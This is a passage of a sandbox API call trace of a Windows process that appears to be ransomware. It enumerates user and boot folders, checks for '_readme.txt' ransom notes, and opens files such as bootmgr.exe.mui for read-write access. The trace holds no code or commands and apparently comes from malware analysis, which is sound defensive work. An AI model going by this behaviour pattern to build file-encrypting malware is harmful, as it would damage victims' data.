0 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216b00 [0058.136] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216b00 | out: hHeap=0x660000) returned 1 [0058.137] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0058.137] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e9c8 | out: hHeap=0x660000) returned 1 [0058.137] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0058.137] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.138] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.138] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.138] PathFindFileNameW (pszPath="") returned="" [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.138] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.138] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0058.138] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7c0 [0058.138] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.139] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.139] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0058.139] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.139] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.139] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.139] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.139] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.140] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0058.140] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.140] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.140] PathFindFileNameW (pszPath="") returned="" [0058.140] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.140] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.140] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.140] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.140] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0058.140] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0058.140] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.141] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.141] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.141] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0058.141] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.141] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.141] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned=".txt" [0058.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.141] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.141] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.141] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.141] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap 